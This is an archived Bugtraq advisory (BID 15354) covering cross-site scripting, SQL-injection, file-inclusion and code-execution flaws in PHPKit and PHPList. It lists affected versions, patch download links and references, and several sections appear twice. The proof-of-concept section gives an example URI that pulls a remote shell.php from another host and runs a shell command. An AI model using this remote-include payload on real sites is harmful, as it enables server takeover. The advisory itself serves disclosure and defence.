PHPKit Multiple Input Validation Vulnerabilities
BID:15354
Info
PHPKit Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15354 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 08 2005 12:00AM |
| Updated: | Feb 17 2006 01:02AM |
| Credit: | Christopher Kunz, Stefan Esser, Stefan Walk and Johann-Peter Hartmann are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHPList Mailing List Manager 2.10.1 PHPList Mailing List Manager 2.8.12 PHPList Mailing List Manager 2.6.4 PHPList Mailing List Manager 2.6.3 PHPList Mailing List Manager 2.6.2 PHPList Mailing List Manager 2.6.1 PHPList Mailing List Manager 2.6 PHPKIT PHPKIT 1.6.1 R2 PHPKIT PHPKIT 1.6.1 PHPKIT PHPKIT 1.6 .03 PHPKIT PHPKIT 1.6 .02 PHPKIT PHPKIT 1.6.03 |
| Not Vulnerable: |
PHPList Mailing List Manager 2.10.2 |
Discussion
PHPKit Multiple Input Validation Vulnerabilities
PHPKIT is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input.
The application is prone to multiple cross-site scripting, HTTP-injection, SQL-injection, local file- inclusion, and arbitrary code-execution vulnerabilities.
PHPKIT is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly santize user-supplied input.
The application is prone to multiple cross-site scripting, HTTP-injection, SQL-injection, local file- inclusion, and arbitrary code-execution vulnerabilities.
Exploit / POC
PHPKit Multiple Input Validation Vulnerabilities
No exploit is required.
The following proof of concept is available for the remote file include issue:
http://www.securityfocus.com/data/vulnerabilities/exploits/shell.php
Use with the following example URI:
http://www.example.com/[path]/include.php?cmd=ls%20-la&path=\\192.168.1.2\c\shell.php
No exploit is required.
The following proof of concept is available for the remote file include issue:
http://www.securityfocus.com/data/vulnerabilities/exploits/shell.php
Use with the following example URI:
http://www.example.com/[path]/include.php?cmd=ls%20-la&path=\\192.168.1.2\c\shell.php
Solution / Fix
PHPKit Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
PHPList Mailing List Manager 2.10.1
PHPList Mailing List Manager 2.6
PHPList Mailing List Manager 2.6.1
PHPList Mailing List Manager 2.6.2
PHPList Mailing List Manager 2.6.3
PHPList Mailing List Manager 2.6.4
PHPList Mailing List Manager 2.8.12
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
PHPList Mailing List Manager 2.10.1
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.1
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.2
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.3
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.6.4
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
PHPList Mailing List Manager 2.8.12
-
PHPList phplist-2.10.2.tgz
http://prdownloads.sourceforge.net/phplist/phplist-2.10.2.tgz?download
References
PHPKit Multiple Input Validation Vulnerabilities
References:
References:
- Advisory 21/2005: Multiple vulnerabilities in PHPKIT (Hardened-PHP Project)
- PHPKIT Homepage (PHPKIT)
- PHPList Information Page (PHPList)
- [TKADV2005-11-001] Multiple vulnerabilities in PHPlist ([email protected])